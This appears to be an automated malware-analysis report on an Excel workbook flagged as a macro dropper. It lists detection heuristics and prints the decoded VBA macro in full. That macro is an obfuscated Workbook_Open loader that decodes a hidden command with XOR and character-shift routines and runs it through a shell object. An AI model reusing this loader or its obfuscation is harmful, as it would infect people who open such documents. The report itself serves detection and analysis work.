MALICIOUS
288
Risk Score
Heuristics 6
-
ClamAV: Xls.Dropper.Agent-7574312-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-7574312-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set objShell = CreateObject(NAfEeUYBBmAvAWRiMkxRKGlDQLwYgBruJGIOpxCPrOBYaqCzeHwqgXJHObJTYAqzQGmONX("HASJUHFSAHFSAIJUFHSAOLSA", (UQFEHZBRTTazYTRBNgkrIBHLZvgfbzECiETvIlyLaZDPBzcLLnsfYSRnIPeLOrppOXmoAq("7<868?8=879<8=<L7H8K9<8J8;", "6")))) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set objShell = CreateObject(NAfEeUYBBmAvAWRiMkxRKGlDQLwYgBruJGIOpxCPrOBYaqCzeHwqgXJHObJTYAqzQGmONX("HASJUHFSAHFSAIJUFHSAOLSA", (UQFEHZBRTTazYTRBNgkrIBHLZvgfbzECiETvIlyLaZDPBzcLLnsfYSRnIPeLOrppOXmoAq("7<868?8=879<8=<L7H8K9<8J8;", "6")))) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Public Sub Workbook_Open()
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3615 bytes |
SHA-256: d8a71ddaf1eb8f5ecf44b46457bf30d40552ecc50f00de15157052e9002475af |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Workbook_Open()
Set objShell = CreateObject(NAfEeUYBBmAvAWRiMkxRKGlDQLwYgBruJGIOpxCPrOBYaqCzeHwqgXJHObJTYAqzQGmONX("HASJUHFSAHFSAIJUFHSAOLSA", (UQFEHZBRTTazYTRBNgkrIBHLZvgfbzECiETvIlyLaZDPBzcLLnsfYSRnIPeLOrppOXmoAq("7<868?8=879<8=<L7H8K9<8J8;", "6"))))
Dim NOeEnykYtlFcJMctqtFDGeJspgvTjKQUGVByVjZtQCEZTQMNWcfHBclDFmOGDQKEqlqJKz As String
NOeEnykYtlFcJMctqtFDGeJspgvTjKQUGVByVjZtQCEZTQMNWcfHBclDFmOGDQKEqlqJKz = NAfEeUYBBmAvAWRiMkxRKGlDQLwYgBruJGIOpxCPrOBYaqCzeHwqgXJHObJTYAqzQGmONX("HASJUHFSAHFSAIJUFHSAOLSA", UQFEHZBRTTazYTRBNgkrIBHLZvgfbzECiETvIlyLaZDPBzcLLnsfYSRnIPeLOrppOXmoAq("979I9J969G9;9H8:8:8G=J8:978L=;<H8J8H8:8I9?8=8>8=8L898;9?878;8G<78G9L89869G9?=;<H7L=96?8<8>9=8:8<<7=K8?9G8;8H988L8I<<=H8L8I9J=>8?8G9?8:8I9>=97897988=8L9><<6>9<9;<<779<896G8<9I898<8=<><76>9I9<8<8J9I8H976K8L9L8:<6<79H9;9J9G8<=I<==I8I8I8798=6<<889I8==G8L9:9<869I8>9<989G<:969K8J=:<J<H8?9J9==87;9<8=8;<9<76L8L8J979;8>8;8L=H69969<<<<<===H6L8J9<=K6;9=8889969;<><H968K8:<G6<8K8J9L8J<76J89978:8>968H87878?9J<><<7;9H8:8;8<769K8J969:9H8?=H<;8J8L8;=6678J8H89<G<L7G9J8:9K8I9I8G8J=J6:9=8?=:<>", "6"))
Dim sbTMIZaEttThRHeInzjTsjUSpzMUEDvDDXEYIKphdWNpIrUYuhSrZrcJGBWIhazLTPeuCG As String
sbTMIZaEttThRHeInzjTsjUSpzMUEDvDDXEYIKphdWNpIrUYuhSrZrcJGBWIhazLTPeuCG = NOeEnykYtlFcJMctqtFDGeJspgvTjKQUGVByVjZtQCEZTQMNWcfHBclDFmOGDQKEqlqJKz
objShell.Run (sbTMIZaEttThRHeInzjTsjUSpzMUEDvDDXEYIKphdWNpIrUYuhSrZrcJGBWIhazLTPeuCG)
End Sub
Public Function NAfEeUYBBmAvAWRiMkxRKGlDQLwYgBruJGIOpxCPrOBYaqCzeHwqgXJHObJTYAqzQGmONX(tOhhvRZiyZIROYFBOGwVANIErrtCHUYIlcjhIUxNDBykKbGRtPMfSNsfayLEsWaeVVgmKs As String, DataIn As String) As String
Dim lonDataPtr As Long
Dim strDataOut As String
Dim intXOrValue1 As Integer
Dim intXOrValue2 As Integer
For lonDataPtr = 1 To (Len(DataIn) / 2)
intXOrValue1 = Val("&H" & (Mid$(DataIn, (2 * lonDataPtr) - 1, 2)))
intXOrValue2 = Asc(Mid$(tOhhvRZiyZIROYFBOGwVANIErrtCHUYIlcjhIUxNDBykKbGRtPMfSNsfayLEsWaeVVgmKs, ((lonDataPtr Mod Len(tOhhvRZiyZIROYFBOGwVANIErrtCHUYIlcjhIUxNDBykKbGRtPMfSNsfayLEsWaeVVgmKs)) + 1), 1))
strDataOut = strDataOut + Chr(intXOrValue1 Xor intXOrValue2)
Next lonDataPtr
NAfEeUYBBmAvAWRiMkxRKGlDQLwYgBruJGIOpxCPrOBYaqCzeHwqgXJHObJTYAqzQGmONX = strDataOut
End Function
Public Function UQFEHZBRTTazYTRBNgkrIBHLZvgfbzECiETvIlyLaZDPBzcLLnsfYSRnIPeLOrppOXmoAq(OwitQDTMJvoVTIHuykIAnNcnSjEOBziIKUYQxACipQFErtXhioZBBVDVUPbBUFLfhBKykL As String, second As Integer)
Dim first As Integer
For first = 1 To Len(OwitQDTMJvoVTIHuykIAnNcnSjEOBziIKUYQxACipQFErtXhioZBBVDVUPbBUFLfhBKykL)
Mid(OwitQDTMJvoVTIHuykIAnNcnSjEOBziIKUYQxACipQFErtXhioZBBVDVUPbBUFLfhBKykL, first, 1) = Chr(Asc(Mid(OwitQDTMJvoVTIHuykIAnNcnSjEOBziIKUYQxACipQFErtXhioZBBVDVUPbBUFLfhBKykL, first, 1)) - second)
Next first
UQFEHZBRTTazYTRBNgkrIBHLZvgfbzECiETvIlyLaZDPBzcLLnsfYSRnIPeLOrppOXmoAq = OwitQDTMJvoVTIHuykIAnNcnSjEOBziIKUYQxACipQFErtXhioZBBVDVUPbBUFLfhBKykL
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 15872 bytes |
SHA-256: 81608392fffca799ea0948f21a92095b6327d094a49e28d172e9278a7a6127ff |
|||
|
Detection
ClamAV:
Xls.Dropper.Agent-7574312-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.